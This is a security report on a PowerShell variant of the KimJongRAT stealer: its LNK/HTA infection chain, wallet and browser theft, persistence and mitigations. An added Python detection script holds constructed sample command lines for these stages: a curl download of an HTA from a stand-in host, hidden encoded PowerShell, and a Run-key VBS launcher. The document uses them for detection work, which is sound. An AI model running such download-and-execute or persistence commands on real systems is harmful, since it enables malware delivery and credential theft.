Security researchers have identified a new and sophisticated variant of the KimJongRAT information stealer, notable for its advanced evasion techniques, robust persistence mechanisms, and a novel PowerShell-based implementation. This latest evolution of the KimJongRAT malware family, which first emerged in 2013, demonstrates a heightened focus on stealing both general system data and cryptocurrency assets, leveraging multi-stage delivery chains and legitimate infrastructure to evade detection.
Infection Chain and Delivery Mechanisms
The new KimJongRAT variant is distributed through carefully crafted malicious Windows shortcut (LNK) files. When executed by an unsuspecting user, these LNK files download an HTML Application (HTA) file from an attacker-controlled Content Delivery Network (CDN), often utilizing legitimate cloud services to bypass traditional security controls.
PowerShell Variant Workflow
The PowerShell-based variant follows a multi-stage infection process:
- LNK File Execution: The user initiates the attack by clicking a malicious LNK file, which downloads and runs an HTA file.
- Payload Deployment: The HTA file drops a decoy PDF and a ZIP archive onto the victim’s system.
- Archive Extraction: The ZIP archive contains the PowerShell-based stealer and a Visual Basic Script (VBS) for persistence.
- Stealer Activation: The PowerShell script loads both the stealer and an embedded keylogger, establishes registry-based persistence, and initiates data exfiltration.
- Data Exfiltration: Stolen information is compressed and transmitted to the attacker’s command-and-control (C2) server in discrete chunks via HTTP POST requests.
Technical Capabilities
The PowerShell variant of KimJongRAT is engineered for comprehensive data theft and stealth:
- Data Harvesting: The malware targets browser data and cryptocurrency wallet extensions, including MetaMask, Trust Wallet, TronLink, Binance Chain Wallet, Coinbase Wallet, Phantom, Exodus Web3 Wallet, and more than 40 additional wallets. It extracts credentials, cookies, and sensitive files from popular browsers such as Chrome, Edge, Firefox, and Naver Whale.
- Keylogging: An integrated keylogger captures keystrokes, clipboard contents, and active window titles.
- Persistence: A VBS script ensures the stealer is re-executed at each user logon by modifying specific registry keys.
- Evasion: The malware employs anti-virtual machine (anti-VM) techniques and obfuscation methods, including encoded scripts and custom encryption (XOR, RC4), to hinder analysis and detection.
- Backdoor Functionality: KimJongRAT enables remote command execution, additional malware deployment, file uploads/downloads, and interactive sessions with compromised systems.
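To make the workflow and capabilities above concrete from the detection side, here is an added example (not code from the report or from the malware) that runs four correlation checks over constructed process-creation and registry-write records shaped like the chain described: cmd.exe/curl.exe fetching an HTA from a CDN, mshta.exe spawning a hidden, encoded PowerShell stealer, and a VBS re-launched from a Run key. Every host name, path, field name and command line in it is an assumption, not an indicator from the report.

```python
import re

# Constructed sample telemetry (not real IOCs): one chain of events plus a benign one.
EVENTS = [
    {"kind": "process", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c curl.exe -s -o %TEMP%\\lure.hta https://cdn.example.invalid/a/lure.hta"},
    {"kind": "process", "parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe %TEMP%\\lure.hta"},
    {"kind": "process", "parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"kind": "registry", "image": "wscript.exe",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "data": "wscript.exe //B C:\\Users\\u\\AppData\\Roaming\\run.vbs"},
    {"kind": "process", "parent": "explorer.exe", "image": "chrome.exe", "cmdline": "chrome.exe"},
]

SCRIPT_HOSTS = ("wscript", "cscript", "powershell", "mshta", ".vbs", ".ps1", ".hta")

def lolbin_hta_download(e):
    """cmd.exe or curl.exe pulling an .hta over HTTP(S): the first stage of the chain."""
    return (e["kind"] == "process" and e["image"] in ("cmd.exe", "curl.exe")
            and re.search(r"https?://\S+\.hta\b", e["cmdline"], re.I) is not None)

def hta_spawns_powershell(e):
    """mshta.exe launching PowerShell is rare in normal user sessions."""
    return (e["kind"] == "process" and e["parent"] == "mshta.exe"
            and e["image"] == "powershell.exe")

def hidden_encoded_powershell(e):
    """Hidden window plus an encoded command block, as a loader uses to hide its script."""
    c = e.get("cmdline", "").lower()
    return (e["kind"] == "process" and e["image"] == "powershell.exe"
            and ("-w hidden" in c or "-windowstyle hidden" in c)
            and re.search(r"\s-e(c|nc|ncodedcommand)?\s", c) is not None)

def script_run_key_persistence(e):
    """A Run key whose data invokes a script host: the VBS logon persistence."""
    return (e["kind"] == "registry" and "\\currentversion\\run\\" in e["key"].lower()
            and any(s in e["data"].lower() for s in SCRIPT_HOSTS))

RULES = [lolbin_hta_download, hta_spawns_powershell,
         hidden_encoded_powershell, script_run_key_persistence]

def triage(events):
    """Return {rule_name: [event indexes]} for every rule that fired."""
    hits = {}
    for i, e in enumerate(events):
        for rule in RULES:
            if rule(e):
                hits.setdefault(rule.__name__, []).append(i)
    return hits

if __name__ == "__main__":
    for name, idx in triage(EVENTS).items():
        print(f"{name}: events {idx}")
```

Each rule alone will produce some benign noise; the point is that several of them firing on one user session within minutes is the pattern the report describes.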
Trends and Threat Landscape
This campaign demonstrates several notable trends in the cyber threat landscape:
- Multi-Stage, Multi-File Architecture: The use of multiple files and stages, combined with trusted Windows utilities (such as cmd.exe and curl.exe) and public CDN infrastructure, complicates detection and incident response.
- Cryptocurrency Targeting: The shift towards stealing digital assets reflects broader cybercriminal monetization strategies, with both individuals and organizations in the cryptocurrency space at heightened risk.
- Regional Focus: The use of Korean-language lures suggests a possible focus on South Korean targets, although the techniques are broadly applicable.
Indicators of Compromise (IOCs)
Security teams should be vigilant for the following indicators:
- SHA256 hashes for the LNK, HTA, PowerShell loader, stealer, keylogger, and persistence scripts.
- Known malicious CDN URLs and command-and-control server addresses.
Mitigation Strategies
To defend against this evolving threat, organizations should:
- Implement advanced behavioral monitoring and endpoint detection.
- Employ URL and DNS filtering to block suspicious domains and CDN activity.
- Educate users about the risks of opening unsolicited shortcut files and attachments.
- Regularly update incident response procedures to address multi-stage malware campaigns.
